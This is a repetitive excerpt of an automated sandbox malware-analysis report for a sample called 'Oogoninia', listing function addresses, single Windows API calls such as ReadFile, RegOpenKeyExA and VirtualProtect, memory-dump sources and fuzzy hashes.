                                                                                                                                                                                    • API ID: FilePointerwsprintf
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 327478801-0
                                                                                                                                                                                    • Opcode ID: abf4405e99e4dcb85fe8fe58243fd46f792263ec105484f86c7cee990d7a89bb
                                                                                                                                                                                    • Instruction ID: fecccce0915ab20f046520e702d9d3c2ebd546ffbad39029680d96f2603726cc
                                                                                                                                                                                    • Opcode Fuzzy Hash: abf4405e99e4dcb85fe8fe58243fd46f792263ec105484f86c7cee990d7a89bb
                                                                                                                                                                                    • Instruction Fuzzy Hash: B8E01BB1B05115AFD701EB956A4987F7769DF40328F10443BF141F50D1C67E4D429B6D
                                                                                                                                                                                    Function 004022F2 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • WritePrivateProfileStringA.KERNEL32(00000000,00000000,?,00000000), ref: 0040232B
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1191344144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1191289974.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191407654.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: PrivateProfileStringWrite
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 390214022-0
                                                                                                                                                                                    • Opcode ID: 6c1eb3e18aa1cf105a2872d21e97bfa3763926e12a5010dfe0d2da281f2b65f7
                                                                                                                                                                                    • Instruction ID: 5f6267e841dd840bf6295cbe1617e7a0042591bb1814ca2e8a4844537e2a2c78
                                                                                                                                                                                    • Opcode Fuzzy Hash: 6c1eb3e18aa1cf105a2872d21e97bfa3763926e12a5010dfe0d2da281f2b65f7
                                                                                                                                                                                    • Instruction Fuzzy Hash: 67E04F31B001246BD7307AB10F8E97F10999BC4304B39153ABA01B62C6EDBC4C414AB9
                                                                                                                                                                                    Function 0040171F Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SearchPathA.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 00401733
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1191344144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1191289974.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191407654.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: PathSearch
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2203818243-0
                                                                                                                                                                                    • Opcode ID: 6ee8a2cb6661bb696876ffa748e538e6724bcba4671d5e56d17f999e1d815b23
                                                                                                                                                                                    • Instruction ID: e4e3c42305c0b2198e0aecdca264a5a1b937f2a52f25dfaad176198492f8ea82
                                                                                                                                                                                    • Opcode Fuzzy Hash: 6ee8a2cb6661bb696876ffa748e538e6724bcba4671d5e56d17f999e1d815b23
                                                                                                                                                                                    • Instruction Fuzzy Hash: CFE026B2304111AFE740DF68DE48EAA3B98DB10368F30453AF151F60C0E2BA9A41A769
                                                                                                                                                                                    Function 00402BD8 Relevance: 1.5, APIs: 1, Instructions: 22registryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • RegOpenKeyExA.KERNELBASE(00000000,00000642,00000000,00000022,00000000,?,?,?,00402383,00000002), ref: 00402C00
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1191344144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1191289974.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191407654.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Open
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 71445658-0
                                                                                                                                                                                    • Opcode ID: fdb8ee867dc8347cd902a818e27750adf9bf7bda53abb5245a0d02fd0d3a8952
                                                                                                                                                                                    • Instruction ID: 12eae925539b7dc367c8ab6fa63785f67f6a0dd6345a275e5017c2f2efb43849
                                                                                                                                                                                    • Opcode Fuzzy Hash: fdb8ee867dc8347cd902a818e27750adf9bf7bda53abb5245a0d02fd0d3a8952
                                                                                                                                                                                    • Instruction Fuzzy Hash: ADE0B676250108BEDB00EFA9EE4AE9977ECAB58740F108421B608E70A1C678E5508B69
                                                                                                                                                                                    Function 00405A8B Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403135,00000000,00000000,00402F82,000000FF,00000004,00000000,00000000,00000000), ref: 00405A9F
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1191344144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1191289974.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191407654.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FileRead
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2738559852-0
                                                                                                                                                                                    • Opcode ID: 9e9b74a17ccb5deaff559da35202fcfca8c983c6050daaa8761ff941af9ce947
                                                                                                                                                                                    • Instruction ID: 3049aa00f6096361bf05a549768cb7fbda67778921cce1d2793645b00ea59393
                                                                                                                                                                                    • Opcode Fuzzy Hash: 9e9b74a17ccb5deaff559da35202fcfca8c983c6050daaa8761ff941af9ce947
                                                                                                                                                                                    • Instruction Fuzzy Hash: 56E08C3260521ABBEF119E508C40EEB3B6CEB043A0F008933F914E2180E230E8219FE4
                                                                                                                                                                                    Function 00405ABA Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004030EB,00000000,007890F8,000000FF,007890F8,000000FF,000000FF,00000004,00000000), ref: 00405ACE
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1191344144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1191289974.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191407654.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FileWrite
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3934441357-0
                                                                                                                                                                                    • Opcode ID: d04482319dc3028e4ce08f739f1cf32aeeec85f3b87b0f01a1fec36d148a5575
                                                                                                                                                                                    • Instruction ID: 32d48f6e8b76b53ead5095efbfc7dc84fe3b04974c76bcad3a7819726962f715
                                                                                                                                                                                    • Opcode Fuzzy Hash: d04482319dc3028e4ce08f739f1cf32aeeec85f3b87b0f01a1fec36d148a5575
                                                                                                                                                                                    • Instruction Fuzzy Hash: CEE0B63261429AABDF109E659C40AAB7B6CFF05360F148533B915E6150E231E8219EA5
                                                                                                                                                                                    Function 1000270B Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • VirtualProtect.KERNELBASE(1000404C,00000004,00000040,1000403C), ref: 10002729
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1196297422.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1196258164.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1196329175.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1196354573.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_10000000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ProtectVirtual
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 544645111-0
                                                                                                                                                                                    • Opcode ID: 18430b4f65034898945c85cbd496d0600587ffef3804861361c874148a7acf75
                                                                                                                                                                                    • Instruction ID: 4f82052a8ee677216feeb46ba648c84afb962adc58c95b92ee0d34447feb5494
                                                                                                                                                                                    • Opcode Fuzzy Hash: 18430b4f65034898945c85cbd496d0600587ffef3804861361c874148a7acf75
                                                                                                                                                                                    • Instruction Fuzzy Hash: B5F09BF19092A0DEF360DF688CC4B063FE4E3983D5B03892AE358F6269EB7441448B19
                                                                                                                                                                                    Function 00402336 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetPrivateProfileStringA.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 00402369
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1191344144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1191289974.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191407654.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: PrivateProfileString
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1096422788-0
                                                                                                                                                                                    • Opcode ID: e46b05dc8f5ff29729b9ed40f267ec6ff0ae672f09ade1fc8e872b569ad31fa6
                                                                                                                                                                                    • Instruction ID: 863d308e192ce4c0f66b0ae01519e0470cfafd3cecd099ef988cf845eccf6abb
                                                                                                                                                                                    • Opcode Fuzzy Hash: e46b05dc8f5ff29729b9ed40f267ec6ff0ae672f09ade1fc8e872b569ad31fa6
                                                                                                                                                                                    • Instruction Fuzzy Hash: D1E08630A04208BADB10AFA08F09EAD3A79AF41710F24003AF9507B0D1EAB84481DB2D
                                                                                                                                                                                    Function 0040159D Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SetFileAttributesA.KERNELBASE(00000000,?,000000F0), ref: 004015A8
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1191344144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1191289974.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191407654.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AttributesFile
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3188754299-0
                                                                                                                                                                                    • Opcode ID: b1bfa589af0f93098282614436603590eccf1b584019d2a6df4a412e22152707
                                                                                                                                                                                    • Instruction ID: 089d8403b4a3c67af6c4af196b8dedf915adbd4a042e4b2ee6fd832a67879694
                                                                                                                                                                                    • Opcode Fuzzy Hash: b1bfa589af0f93098282614436603590eccf1b584019d2a6df4a412e22152707
                                                                                                                                                                                    • Instruction Fuzzy Hash: 34D05B72704115DBDB10DBE5EB0869D77A0AB40364F304537D151F21D0D2BADA559719
                                                                                                                                                                                    Function 00403138 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402EC1,0002FFE4), ref: 00403146
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1191344144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1191289974.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191407654.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FilePointer
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 973152223-0
                                                                                                                                                                                    • Opcode ID: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
                                                                                                                                                                                    • Instruction ID: 49fdcfdf8b1973cd13611e97ba0bfafd8618b6cb304eeeee9131019f9f046fb0
                                                                                                                                                                                    • Opcode Fuzzy Hash: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
                                                                                                                                                                                    • Instruction Fuzzy Hash: 03B01271644200BFDA214F00DF05F057B21A790700F10C030B748380F082712420EB4D
                                                                                                                                                                                    Function 004014D6 Relevance: 1.3, APIs: 1, Instructions: 19sleepCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • Sleep.KERNELBASE(00000000), ref: 004014E9
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1191344144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1191289974.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191407654.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
